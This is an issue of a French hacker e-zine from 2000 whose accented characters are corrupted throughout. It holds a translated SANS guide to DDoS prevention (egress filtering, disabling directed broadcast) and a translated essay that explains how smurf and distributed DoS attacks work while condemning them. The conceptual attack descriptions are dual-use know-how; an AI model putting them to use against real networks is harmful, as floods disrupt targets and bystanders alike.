20.05.2000 - H@CKOFF No22 - * peril-jeune edition * - АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,ј _/ _/ _/_/ _/_/_/ _/ _/ _/_/ _/_/_/_/ _/_/_/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/_/_/ _/_/_/_/ _/ _/_/ _/ _/ _/_/_/ _/_/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ / _/ _/ _/ _/ _/_/_/ _/ _/ _/_/ _/ _/ АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,ј _________________________________________________________________________ / \ / Bienvenue dans ce Hackoff No 22 arborescente edition (plus que jamais au | / son de la savate). Au sommaire de ce numero 22 on vous expose nos opinions/ | utopico-progressives a tendance maniaco-depravatoires afin de proroger la / \ subliminale fusion moleculaire de l'en-dessous en toute globalitщ... / \_______________________________________ ______________________________/ \ | \| __________ .,:;>The Crew<;:,. / .Silk. \ / ..Gard.. \ ____________________________________/ ..H3rtz!.. \_____________________________ ІЇЈЉЊЋЌ-ЎЏАБВГДЕЗИЙКЛПјиоўцЁЂЃЄЅ І/ ...Misto!... \ЇЈЉЊЋЌ-ЎЏАБВГДЕЗИЙКЛПјиоўцЁЂ ЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏ/ ....Blured.... \ЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏ / .....Tobozo..... \ / .....Sniffdoz..... \ / ...Natural Killer... \ ----8<----+-----8<--------8<---------\-8<--+-------8<--- / Guest : G3n0cId3 \ /------------------------------\ ____________________________________________________________ __________ / TabLe des mAtiшres : \ / HACK0ff \ |ЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏ| ]-=v0L 22=-[ | [01]Disclaimer Tobozo | \ Mai 2000 / | [02]DDos (suite) Cakeii | ЏЏЏЏЏЏЏЏЏЏ | [03]Dosattack Jericho | | [04]XUL & RAM Gard | | [05]Simlock et Cie g3n0c1d3 | | [06]Echelon Auteur Anonyme | | [07]Orgie binaire Tobozo | | [08]Shaftanalyse Cakeii | | | ---------8<------+--------------8<---------------------8<---------------------8<- І : . _ _______________________ _ -*1*- `^А*;:,.> а я $ Љ Ѓ Х я M Ъ Ў <.,:;*А^` _____________________________/ЏЏЏЏЏЏЏBy TobozoЏЏЏЏЏЏЏ\___________________________ ЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,И

L'acces a ce document n'impose pas la lecture de ce disclaimer :

Ce document est ecrit dans le seul but de renseigner.
Il contient des messages subliminaux, des mots interdits et des mots obligщs.
Il ne contient pas de cacahuetes grillees (contrairement a certains bruits).
Il ne s'auto-detruira pas dans les 5 secondes.
Et bien que les apparences soient trompeuse, il ne s'agit pas d'un devoir
de vacances alors les jeunes lecteurs seront priщs de ne PAS appliquer
ce qui s'y trouve a moins d'etre approuvщs par des personnes majeures et
responsables (dans certains cas la bonne conscience y fait office).

Tobozo
Sauvez les Arbres, Mangez du Castor

ЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,И

function Edito() ] *> Press [A] to Abort / [CR] to Continue: [] *> *> *> La suffisance des sens aiguises par l'aisance maitrisee *> s'essaime par la transe exquise de l'arborescence epuisee. *> Antiviral subliminal patriotique conspiration pour le pognon *> serial-nukers pour amateurs pas eclectiques a l'horizon.. *> *> Function edito() barely succeeded *> *> |

ЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,И

_ ________________________________________ _ -*2*- `^А*;:,.> - DDOS (suite) - <.,:;*А^` ___________________/ЏЏЏЏЏЏЏЏЏЏЏЏЏЏ By Cakeii ЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏ\_____________________ ЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,И ndt : bien que cet article soit du rechauffщ il n'a jamais ete autant d'actualite que depuis la mise a l'amende de quelques monstres de l'internet. Et oui, il ne s'agit que d'une traduction mais elle a subi des ameliorations et des mises a jour.

Se proteger des DDoS
Vous pouvez р prщsent rщduire les chances que votre rщseau soit employщ pour endommager d'autres rщseaux si vous mettez en application les deux щtapes suivantes :

Filter votre rщseau contre les paquets IP contrefaits (spoofer) sortant.

Stopper l'щmission de DDoS depuis votre rщseau.
Ces deux щtapes devront ъtre mises en application immщdiatement, et les instructions dщtaillщes pour les mettre en place sont fournies ci-dessous. La large application de ces deux mщthodes peut de maniшre significative rщduire la menace constituщe par les attaques de type DoS.
Etape 1 : Filter votre rщseau contre les paquets IP contrefaits (spoofer) sortant.
But: Empъcher votre rщseau d'ъtre la source des communications spoofer (c.-р-d. contrefait) qui sont souvent employщes dans des attaques de DoS.
Action: S'assurer que vos routeurs et firewall sont configurщs pour expщdier les paquets IP seulement si ces paquets ont comme adresse IP source celle de votre rщseau. La source correcte de l'adresse(s) IP doit ъtre l'adresse de votre rщseau IP qui lui a щtщ assignщe. Il est important de faire ceci dans tout votre rщseau, particuliшrement dans le raccordement externe vers Internet ou vers un fournisseur ascendant.
Щtape 1.1: Rejeter Les Adresses sources Invalides
Tous les organismes reliщs р l'Internet devraient seulement permettre aux paquets contenant des adresses sources valides de sortir de leur rщseau. Ceci rщduira au minimum la chance que votre rщseau soit la source d'une attaque d'IP contrefait (spoofed IP). Ceci n'empъchera pas des attaques distribuщes DoS venant de votre rщseau avec des adresses source s valides.
Afin de mettre en application ceci vous devrez connaюtre les blocs d'adresses du rщseau IP qui sont en service sur votre site. Si vous ne connaissez pas cette information actuellement, alors sauter р l'щtape 1.2, et revenez р cette щtape une fois que vous avez obtenu cette information.
Se prщmunir contre le trafic d'adresses IP contrefait peut ъtre accompli par un filtrage sur des routeurs, firewall, et des machines. Voici un exemple gщnщrique de filtre :
allow les adresses valides de votre site vers internet
Deny Toutes les autres adresses sources
Sur le routeur(s) reliщ р votre ISP(s), si l'adresse de l'interface IP qui la relie р l'ISP n'est pas sur un des blocs d'adresses IP de votre site, vous devrez щgalement permettre р l'adresse de l'interface IP de passer.
Pour obtenir des instructions dщtaillщes pour la mise en place de filtre, veuillez choisir la plateforme que vous utilisez dans la liste "щtape 1 : directions dщtaillщes " ci-dessous.
Etape 1.2 : Rejet des adresses IP privщes et rщservщes
Cette щtape n'est pas nщcessaire si vous pouviez accomplir entiшrement l'щtape 1.1
Si vous n'ъtes pas certain de connaitre quel adressage IP est en service actuellement sur votre site, alors vous devrez au moins rejeter les adresses privщes (RFC 1918 ) et les adresses IP rщservщes.
Ce qui suit est une liste d'adresses source qui devront ъtre filtrщes.
0.0.0.0/8 - Historical Broadcast
10.0.0.0/8 - RFC 1918 Private Network
127.0.0.0/8 - Loopback
169.254.0.0/16 - Link Local Networks
172.16.0.0/12 - RFC 1918 Private Network
192.0.2.0/24 - TEST-NET
192.168.0.0/16 - RFC 1918 Private Network
224.0.0.0/4 - Class D Multicast
240.0.0.0/5 - Class E Reserved
248.0.0.0/5 - Unallocated
255.255.255.255/32 - Broadcast

Si vous utilisщ la translation d'adresse (NAT), vous devez vous assurer que vous exщcutez bien ce filtre entre votre dispositif NAT et votre ISP, et vous devriez щgalement vщrifier que votre configuration NAT traduit seulement l'adresse utilisщe et autorisщe pour votre plan d'adressage interne.
Rejeter les adresses privщes et rщservщes des adresses IP source peut ъtre accompli par filtrage sur des routeurs, des firewall, et des machines. Pour obtenir des instructions dщtaillщes pour la mise en place de filtre, veuillez choisir la plateforme que vous utilisez dans la liste "щtape 1 : directions dщtaillщes " ci-dessous.
Etape 1 : Filter votre rщseau contre les paquets IP contrefait (spoofer) sortant.
Veuillez choisir le routeur, le firewall, ou la machine que vous employez dans la liste ci-dessous pour des instructions dщtaillщes sur la faчon de mettre en application cette technique :

Bay

Cabletron

Cisco

Etape 2 : Stopper l'щmission de DDoS depuis votre rщseau
But: s'assurer que votre rщseau ne peut pas ъtre employщ pour l'щmission de DDoS pour inonder d'autres rщseaux avec des attaques telles que le "smurf".
Action: Configurer tous vos systшmes (routeurs, postes de travail, serveurs, etc...) de sorte qu'ils ne reчoivent pas ou n'expщdient pas de trafic Broadcast dirigщ.
Etape 2.1 : Dщsactiver le Broadcast IP dirigщ sur tout le rщseau
Les techniques dщtaillщes pour faire ceci sont disponibles pour les systшmes suivants.

Bay

Cisco

Pour tous les autres systшmes, aller р http://users.quadrunner.com/chuegen/smurf/ oљ vous trouverez la page de Craig Huegen qui fait autoritщ dans ce domaine, celle ci contient des instructions pour beaucoup d'autres types de systшmes.
Les systшmes suivants ont le Broadcast dirigщ dщsactivщ par dщfaut. Cependant, sur ces systшmes il peut y avoir une maniшre detourner pour enclencher ce comportement. Veuillez choisir le lien pour votre plateforme afin de s'assurer que le systшme est dщsactivщ par dщfaut, et ne permet pas des Broadcast dirigщs.

Cabletron

Microsoft Windows Workstation & Server 3.5 & 3.5.1

Pour windows NT 4,0, le comportement par dщfaut pour les paquets Broadcast dirigщs a щtщ modifiщ dans le service pack 4. Les derniers service pack pour NT peuvent ъtre obtenus sur le site de Microsoft http://support.microsoft.com/support/kb/articles/Q152/7/34.ASP
Etape 2.2 Tester votre rщseau pour dщterminer si c'est un site de gщnщration de DDoS
Pour examiner votre rщseau afin de voir s'il agit en tant qu'emetteur de DDoS vous pouvez employer la commande "ping" pour envoyer un paquet 'echo request' р l'adresse de base du rщseau et р l'adresse Broadcast de votre rщseau.
Vous devrez connaitre l'adresse IP de base du rщseau et votre adresse de Broadcast. Le Tableau CIDR peut ъtre utile pour dщterminer les adresses de votre rщseau.
depuis une machine du cєtщ d'Internet (c.-р-d. en dehors du rщseau) pinger les deux adresses de base de rщseau (x.x.x.0 pour une /24 de classes C) et de Broadcast (x.x.x.255 pour une /24 de classe C) d'un sous-rщseau interne avec un certain nombre de machines dessus.
Choisir parmi la liste suivante le systшme d'exploitation pour des instructions dщtaillщes sur l'employe de la commande ping et l'analyse pour dщterminer si votre rщseau est un site d'amplification de Broadcast.

FreeBSD 3.0

Linux (RedHat 6.1)

Solaris

Une autre maniшre d'examiner votre rщseau est d'aller sur une site web publique qui teste votre rщseau р distance.
Il est important de savoir que ces sites sont actionnщs par les tiers indщpendants, et que vous devrez employer ce type de site р votre propre risque. Si votre site est faible il peut ъtre ajoutщ р une " liste noire " qui peut alors ъtre employщ par des attaquants pour identifier votre site et devenir un 'bon' site pour faire de l'amplification de Broadcast. Pour cette raison vous ъtes fortement encouragщs р l'auto-test avec les commandes de ping щnumщrщes ci-dessus.

http://www.netscan.org/

http://www.powertech.no/smurf/

Щtape 2.3: Exiger que les fournisseurs dщsactivent le Broadcast dirigщe par dщfaut.
Quand vous achetez de nouveaux systшmes, exiger que le fournisseur dщsactivent la rщception et l'expщdition des paquets de Broadcast dirigщs comme indiquщ dans le RFC 2644.
Dans le RFC 2644
Un routeur PEUT avoir une option de configuration pour lui permettre de recevoir les paquets Broadcast dirigщs, toutefois cette option DOIT ъtre dщsactivщe par dщfaut, et le routeur NE DOIT PAS recevoir les paquets Broadcast dirigщs р moins qu'un utilisateur les spщcifiquement configurщ. Un routeur PEUT avoir une option pour permettre de recevoir un prefix rщseau de Broadcat dirigщs sur une interface et PEUT avoir une option pour permettre un prefix rщseau Broadcast dirigщes pour l'expщdition. Ces options DOIVENT ъtre par dщfaut bloquщes pour la rщception et l'expщdition de prefix rщseau de Broadcast dirigщs.
Sur cette base vous devrez demander р vos fournisseurs si le Broadcast dirigщ est dщsactivщ par dщfaut. Au minimun le fournisseur devrait fournir un mщcanisme pour dщsactiver le Broadcast dirigщ.
Quelques fournisseurs dщsactivent dщjр le Broadcast dirigщ par dщfaut dans les derniшres versions de leur logiciel, mais beaucoup ne le font pas. Penser р щducer les fournisseurs en les dirigeant vers le RFC 2644..
Original :
www.sans.org/ddos.htm
Traduit :
par cakeii - Cakeii@usa.net

_ ____________________________________________ _ -*3*- `^А*;:,.> Dosattack <.,:;*А^` ___________________/ЏЏЏЏЏЏЏЏЏЏЏЏЏЏ By Jericho117 ЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏ\_____________________ ЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄК

original: dosattack.html

Agressif Scripting (Leчons de DoS)

J'ai commencщ р щcrire cet article il y a presque un an, aprшs les assauts d'attaques smurf lancщs contre divers rщseaux sur Internet. A cette щpoque, la toute derniшre attaque de Denial of Service dщcouverte щtait un outil paralysant ayant un seul but; inactiver une machine distante en la floodant avec plus de trafic qu'elle ne pouvait supporter. L'attaque smurf щtait la premiшre des attaques DoS bien connue (et bien abusщe) qui pouvait rщellement paralyser un rщseau quelconque, quelle que soit sa taille ou sa bande passante. C'щtait donc un nouveau problшme pour les administrateurs et personnel de sщcuritщ du monde entier.

Le Principe

Aussi connue sous le nom de Network Saturation Attacks ou Brandwidth Consumption Attacks, la nouvelle gщnщration d'attaques DoS floode un rщseau distant avec une vertigineuse quantitщ de trafic. Les routeurs et serveurs visщs vont р une vitesse surmultipliщe, essayant d'acheminer et d'assimiler chaque paquet qui arrive. Comme le rщseau reчoit de plus en plus de ces paquets illщgitimes, il va rapidement refuser le trafic lщgitime, tel que le web et les mails. En quelques minutes, toute l'activitщ du rщseau est coupщe du fait que l'attaque consomme toutes les ressources disponibles du rщseau.

Prщcщdant l'attaque de saturation de la bande passante, la plupart des attaques DoS impliquent l'envoi de trшs peu de paquets mal-formщs р un serveur distant, entraюnant ainsi son plantage. Ceci est du р un bug qui fait que plusieurs serveurs assimilaient les paquets mal-formщs, provoquant ainsi une rщaction en chaюne. Ces paquets (ou Magic paquets) consistaient en l'envoi de donnщes dont l'en-tъte contenait des ordres propres a des options de protocole de rщseau, et qui щtaient prщsentщes dans un mauvais ordre, qui ne correspondaient pas, ou qui щtaient de trop grand format. Par consщquent, un serveur qui recevait ces paquets mal-formщs n'avait pas de rшgles ou indications disant comment il devait rщagir et traiter ces paquets. Le rщsultat щtait une panique ou un plantage du systшme qui forчait simplement р щteindre ou р redщmarrer la machine. La plus connue des attaques de ce type est peut-ъtre l'attaque WinNuke (щcran bleu de la mort).

Sans regarder l'щthique ou le motif, les attaques DoS de Magic Packets ont montrщ un soupчon de grтce dans leur exщcution. Un simple paquet envoyщ d'un serveur р un autre, le faisant planter ou redщmarrer, reprщsentait une attaque bien ciblщe. La prщcision avec laquelle ces paquets sont envoyщs est analogue р l'utilisation d'un scalpel en chirurgie. En contrepartie, les attaques de saturation de bande passante impliquaient l'envoi de millions de paquets. Pire, une fois lancщe, l'attaque ne respectait pas ce qui se trouvait entre le point de dщpart et le rщseau ciblщ. Dans plusieurs cas, des milliers de clients partageant la bande passante avec la cible sont aussi affectщs. Une simple attaque de cette nature avait la possibilitщ de couper des milliers de machines d'Internet d'un seul coup. Ces attaques sont donc щquivalentes р l'usage d'une hache en chirurgie.

La gщnщration suivante

Les attaques comme la smurf DoS ont un effet de cascade qui peut ъtre vu comme une avalanche virtuelle. Le point de dщpart n'est rien de plus que quelques pierres et boules de neiges (paquets). En descendant la pente (le chemin du routeur р la cible), ils accumulent plus de masse et dщclenchent la crщation de plus de boules de neiges. Le temps que la coulщe arrive en bas de la montagne (la cible), elle est submergщe de neige et de rochers. Malgrщ l'efficacitщ de cette attaque, il n'y a seulement qu'un seul point de dщpart depuis lequel l'attaque est lancщe. Si une attaque est dщtectщe assez tєt, il est possible de filtrer les paquets offensifs avant qu'ils ne quittent leur rщseau d'origine.

La nouvelle gщnщration d'attaques de type Denial of Service est connue sous le nom d'attaque Distributed Denial of Service (DDoS). En prolongeant l'idщe d'une attaque de saturation du rщseau, le DDoS fait la mъme chose mais avec plusieurs points de dщpart. La philosophie et l'objectif de cette attaque sont doubles. Primo, si une simple machine utilisщe pour lancer l'attaque est dщcouverte et dщsactivщe, l'attaque, dans sa totalitщ aura presque toute sa puissance. Secundo, en utilisant plusieurs points de dщparts sur diffщrents rщseaux, un attaquant est capable de planter des rщseaux plus larges, qui n'auraient pas щtщ affectщs pas un flood simple.

Faire Tomber Les Colosses

Avant de lancer ce type de DDoS flood, l'attaquant doit d'abord rщserver diffщrents hєtes sur diffщrents rщseaux. Le plus de rщseaux et machines sont utilisщes en point de dщpart, la plus puissante sera l'attaque. Une fois que chaque hєte s'est introduit, il doit installer un programme de client DDoS sur la machine qui serait prъte р accomplir l'attaque. Une fois que le rщseau des serveurs rщservщs est configurщ avec le nouveau programme client, l'attaquant peut lancer une commande rapide depuis un programme serveur DDoS dщclenchant chaque machine pour lancer l'attaque.

[graphique comparant 56k vs cable vs t1 vs t3]
Jusqu'р cette derniшre vague d'attaques DDoS, on assumait que les hєtes rщsidants sur des backbones (connections avec une incroyable bande passante) ne pouvaient pas ъtre sщrieusement affectщs par des attaques de saturation de rщseau. Comme de larges providers (ISPs, FAI) s'en sont rendus compte, ce n'est plus le cas. En utilisant plusieurs petites connections de rщseaux, un attaquant peut щventuellement saturer les plus grands ISPs et saturer toute leur bande passante. C'est ce qui a щtщ dщmontrщ le plus efficacement avec les trois heures de coupures de Yahoo, et les attaques consщcutives contre eBay, Amazon, Buy.com et autres grands sites web.

La difficultщ р tracer

Il semble que les neophytes du rщseau se demandent pourquoi ces attaques ne sont pas dщpistщes, et pourquoi on n'arrъte pas l'auteur. Il est rare de voir des ISPs qui s'intщressent au dщpistage de(s) l'individu(s) derriшre ces attaques. Plutєt que de prendre le temps et l'effort d'effectuer une enquъte (ce qui est long), la plupart des ISPs se rendent comptent qu'un filtre rapide refusant tout le trafic du site щtant attaquщ est une meilleure solution. De ce fait, l'ISP fait le travail de la personne qui a lancщ l'attaque et bien plus efficacement. Comme vous pouvez l'imaginer, ce n'est pas vraiment une dissuasion pour ceux qui commettent l'attaque.

Une des principales raisons qui font que l'enquъte d'une attaque DoS est longue est qu'elle implique de dщpister tous les paquets touchant la cible. Plutєt que de quitter le point de lancement avec l'adresse IP de la machine qui est utilisщe, les paquets sont attachщs р une fausse source d'adresse IP. Comme l'information de l'IP dans chaque paquet varie fortement, et comme les adresses ne peuvent pas ъtre prises au sщrieux, un administrateur rщseau doit tracer les paquets jusqu'р la source avec les routeurs, un par un. Cela demande de se connecter au routeur (souvent cela doit ъtre fait sur une console physique pour des problшmes de sщcuritщ), mettre en place un filtre ou sniffer pour dщtecter d'oљ les paquets proviennent jusqu'р ce routeur, et ensuite aller au nouveau routeur offensif. Cela prщsente des problшmes si on considшre que chaque paquet peut traverser par exemple trente routeurs, de dix compagnies diffщrentes.

L'action de fausser la source d'IP d'un paquet est appelщe IP Spoofing et elle est la base d'une large variщtщ d'attaques de rщseaux. Une des intentions originelles de l'attaque de Denial of Service щtait de bloquer une machine hors du rщseau pour prendre son identitщ. Une fois que vous avez pris l'identitщ de cette machine, il est aussi possible d'intercepter le trafic qui lui щtait destinщ et de gagner l'accшs р d'autres machines du rщseau ciblщ grтce р des relations internes, confiantes de l'hєte. Les attaquants aujourd'hui donnent l'impression d'avoir perdu le but premier que permettrai une attaque DoS.

Sauver la situation

Les attaques de Denial of Service ne sont pas nouvelles. Elles ont existщ sous une forme ou une autre depuis que les ordinateurs ont щtщ inventщs. Auparavant elles consistaient en une saturation de ressources comme l'espace disque, la mщmoire ou les cycles CPU. Ceux qui ne sont pas familiarisщs avec le fonctionnement des ordinateurs crient souvent р des solutions rapides aux diverses attaques DoS qui sont un flщau pour notre rщseau. Malheureusement, ceci est plus facile р dire qu'р faire.

Chaque jour en semaine, le matin et l'aprшs-midi des millions de Franчais vont et repartent du travail. Ils s'entassent sur des routes deux ou quatre voies pour avancer lentement. Faire dix kilomшtres en une heure est une chose assez commune pour ceux qui ont р faire en heures de pointe dans des zones р fort trafic des grandes villes du pays. Chaque jour, ils suivent ce rituel, criant et maudissant les autres milliers de conducteurs qui entravent les routes, et jour aprшs jour le problшme ne se fixe pas de lui-mъme. Que ce soit des paquets ou des voitures, les choses font qu'ils vont surcharger les routes ou connections rщseau. Au bout d'un certain temps, trop d'entre eux vont pousser le trafic р une limite. Pourquoi est-ce que le problшme de trafic n'est pas rщsolu? Nous savons tous que la solution serait de plus grandes et meilleures routes, plus de parkings, des horaires dщfinis, et plus de sens commun derriшre le volant. Il y a de fortes chances que ceci arrive un jour prochain. D'un autre cєtщ, il est totalement diffщrent de fixer chaque routeur sur chaque rщseau et installer des mщcanismes pour щviter des attaques de saturation du rщseau.

En fin de compte, ce qui pourrait щliminer ces attaques serait plutєt une simple modification р effectuer. Tous les dispositifs de rщseau qui acceptent ou font passer un trafic de rщseau peuvent ъtre paramщtrщs pour mieux gщrer leur activitщ. Si un serveur web reчoit trop de requъtes, il va refuser les nouvelles connections de telle maniшre que les connections existantes puissent subsister. Cette technique est appelщe throttling ou bandwidth limiting et elle est destinщe р щviter les connections excessives, pour conserver les ressources et faire en sorte que les choses fonctionnent correctement. Malheureusement, cette philosophie n'est pas adoptщe par les routeurs (les machines qui transfшrent tout le trafic internet) et donc les attaques de saturation de bande passante n'ont aucune rщsistance qui s'oppose р elles. Une trшs faible part des rщseaux a compris que ceci щtait une bonne solution contre les attaques de flood. Dans leur cas, les routeurs sont paramщtrщs pour gщrer le traffic et bloquer le trafic illщgitime une fois dщtectщ. Le problшme de cette approche est qu'une fois que les paquets de flood ont atteint leur cible, les dщgтts sont dщjр faits. Le point faible de ce mщcanisme est le temps de latence ajoutщ lorsque le routeur vщrifie chaque paquet qui le traverse. A cause de ce ralentissement, les ISPs hщsitent р implщmenter cette solution.

Pour faire fonctionner la rщgulation de connexion (throttling) correctement, chaque routeur de rщseau devrait avoir un mщcanisme implщmentщ. Ceci permettrait р un routeur proche de la source de l'attaque de dщtecter le trafic illicite et de mettre un filtre qui le rejetterai avant qu'il ne quitte sont point de dщpart. Ceci entraюne щvidemment la question "Comment peut-on savoir si le trafic est illщgitime". En regardant en arriшre dans la section IP spoofing, on peut facilement trouver une solution au problшme. En rщalitщ, le mщcanisme est prщsent dans la plupart des Firewalls de ce jour.

Dans le diagramme ci-dessus, il est montrщ un faux paquet avec l'adresse IP 150.23.83.44. Cela est du au fait qu'un tel paquet ne traverserait pas lщgitimement un rщseau dщsignщ par le sous rщseau 1.2.3.x. A cause de чa, un quelconque routeur sur ce rщseau (plus particuliшrement celui utilisщ comme passerelle vers le monde extщrieur) recevant ce paquet l'ignorerait. Plutєt que de faire passer aveuglщment le paquet sans se poser de question, les routeurs devraient discriminer les paquets suspicieux en refusant de les laisser passer au prochain routeur et donner une sorte d'alarme pour l'administrateur.

Un deuxiшme mщcanisme qui aiderait р couper ces attaques pourrait ъtre mis en place. Un jour donnщ, il y a une quantitщ moyenne de trafic qui passe р travers un quelconque routeur. En surveillant cette moyenne et en appliquant d'autres rшgles communes, les routeurs pourraient ъtre configurщs pour rщguler le traffic hautement augmentщ. Par exemple, si un routeur dщtecte une augmentation soudaine du traffic vers une machine de destination avec laquelle chaque paquet provient d'une origine depuis une adresse IP diffщrente, c'est un bon signe d'attaque de saturation utilisant un paquet spoffщ. Plutєt que de faire passer ce trafic vers le rщseau, le routeur devrait rщguler le traffic pour щviter le probable flood qui va s'ensuivre.

Comme indiquщ plusieurs fois auparavant, plus facile р dire qu'р faire. Mettre en fonction ces dispositifs devient impossible р cause du nombre de fabricants de routeurs. Utiliser ces routeurs sur des rщseaux de production sur l'open Internet concernerait des dizaines de milliers de compagnies maintenant leur prщsence sur Internet. Ces mises р jour demandent du temps et de l'argent, ce que les compagnies hщsitent р sacrifier; jusqu'р la premiшre attaque de ce type qu'elles subissent. Comme la plupart des incidents de sщcuritщ, les compagnies tendent р implщmenter des mesures de sщcuritщ rщactionnelles, rarement des mesures prщactionnelles.

Pourquoi Demander Pourquoi?

A un moment ou un autre, tout le monde de demande pourquoi de telles attaques sont effectuщes. Considщrons les rщcentes sщries d'attaques contre Yahoo, eBay et autres, qui sont un bon exemple comme un autre. Pour couper toute espщrance d'explication valable, "Il n'y a pas de bonne raison!".

Il faut considщrer que cette attaque DDoS affecte des centaines (si ce n'est pas milliers) de machines, dans une large variщtщ de rщseaux. Le seul but de cette attaque est de paralyser ou couper le site ciblщ pour qu'il ne puisse plus recevoir de trafic lщgitime. Il y a une poignщe de raisons pour faire ces attaques, mais aucune d'entre elles n'est valable ou justifiable. En d'autres termes, les attaques DoS sont sans intщrъt et puщriles.

La premiшre raison qui est probablement celle qui a la plus longue histoire est la simple vengeance. Des sites vous ont trahi. Peut-ъtre qu'ils vous ont spammщ, arrъtщ d'hщberger votre page web gratuite, virщ votre pшre ou ils ont commis d'autres transgressions. Les attaques DoS sont une forme de vengeance virtuelle, spщcialement contre les compagnies effectuant du commerce sur Internet. Le principal argument ici est que ces attaques causent des problшmes pour un nombre d'ISPs, et autres clients qui partagent la bande passante avec la cible, aussi bien que les clients satisfaits du site. Cela revient р l'analogie du scalpel contre la hache.

La deuxiшme raison est plutєt orientщe vers les petits dщbutants de scripts, les dщfaceurs de pages web, et autres sous l'illusion qu'ils font partie de la communautщ de la sщcuritщ professionnelle. "Je l'ai fais pour montrer que le systшme щtait vulnщrable!". C'est peut-ъtre la justification la plus pathщtique pour lancer une attaque DoS. Pour de nombreuses personnes, ce n'est pas diffщrent d'un attaquant qui activerait un large dispositif nuclщaire, proche d'un serveur de sociщtщ et ensuite proclamerait "Vous voyez! Ca peut influencer vos opщrations!". Bien sћr que чa le peut, чa a dщjр щtщ prouvщ des milliers de fois.

La troisiшme raison que je peux proposer retombe dans le domaine de la rщcrщation. "Si je ne peux pas jouer au foot, je vais jeter le ballon sur le toit pour que personne d'autre ne puisse y jouer!". Ce troisiшme type de mentalitщ est loin d'une justification de telles attaque. Ce dщsir d'une forme de punition d'un site devrait ъtre considщrщ comme une rщduction intellectuelle pour lancer ces attaques. C'est un bon moyen d'agir avec les compagnies misщrables.

Mes Dщclamations

Trois types d'individus mщritent ici d'ъtre insultщs. Chacun est responsable de ce problшme qui est une plaie pour les utilisateurs d'Internet, et chacun pourrait faire sa partie pour l'arrъter.

Chaque individu qui effectue une attaque DoS sait trшs bien ce qui pourrait lui arriver s'il se faisait attraper. Pratiquement rien. Il n'y a rien pour dщcourager quelqu'un de faire de telles attaques. Les rares fois oљ les administrateurs font un effort pour dщpister l'utilisateur malveillant, ils se font щvincer par l'ISP. Le jour suivant, l'attaquant revient online en accщdant р Internet par l'intermщdiaire d'un autre ISP. Jusqu'р l'attaque de Yahoo, le Bureau Fщdщral d'Investigation (FBI) n'щtait pas concernщ par ces attaques. Jusqu'ici, le FBI n'a pas eut р apprщhender une attaque DoS dщvastatrice contre leur propre page d'accueil (www.fbi.com). Pour une raison ou une autre, ces attaques щtщs vues comme un ennuie, non pas comme une atteinte au commerce des entreprises. L'Application de la Loi doit prendre un plus grand intщrъt dans les attaques DoS et commencer р punir les responsables. Lors d'une attaque de ce type, un agent compщtent d'application de la loi devrait ъtre contactщ pendant quelques heures pour poursuivre l'attaquant et peut-ъtre obtenir des rщsultats.

Comme le FBI, les ISPs qui reчoivent ces attaques devraient prendre des mesures prщactives pour prщvenir les attaques DoS. Quand elles arrivent, les ISPs devraient aussi prendre plus de temps р dщpister l'utilisateur et faire passer l'information vers le service d'application de la loi appropriщ. Plutєt que de silencieusement les couper d'Internet pendant une journщe, prendre une apparence plus active et publique montrant que l'activitщ malveillante ne sera pas tolщrщe aurait un meilleur effet. Les ISPs qui ont peur d'une vengeance doivent se souvenir qu'ils sont dans la meilleure position pour arrъter les attaquants.

Finalement, les jeunes pathщtiques (au sens propre et figurщ) commettent ces attaques. Dans plusieurs cas, ces attaques sont lancщes avec des scripts mythiques щcrits en langages щtrangers juste pour produire de l'effet. Il n'y a aucune grтce, aucune compщtence, et aucun intellect derriшre ces attaques. Vous n'ъtes pas un hacker et vous ne mщritez pas de respect pour vos actions enfantines. Vous n'ъtes pas meilleur que les individus tordus qui pulvщrisent une foule de spectateurs innocents avec une mitrailleuse, seulement pour entailler votre cible. Si vous ne pouvez pas vous exprimer mieux qu'avec une attaque de saturation, cherchez de l'aide offline. Vous en avez douloureusement besoin.

Traduction :
jericho@altranet.fr (hackzone117)
Autre traduction ici : hertz (sOyOs)
Auteur de l'article original : bmartin@attrition.org
Images originales : dalec@attrition.org
Infos trouvees sur : http://www.attrition.org

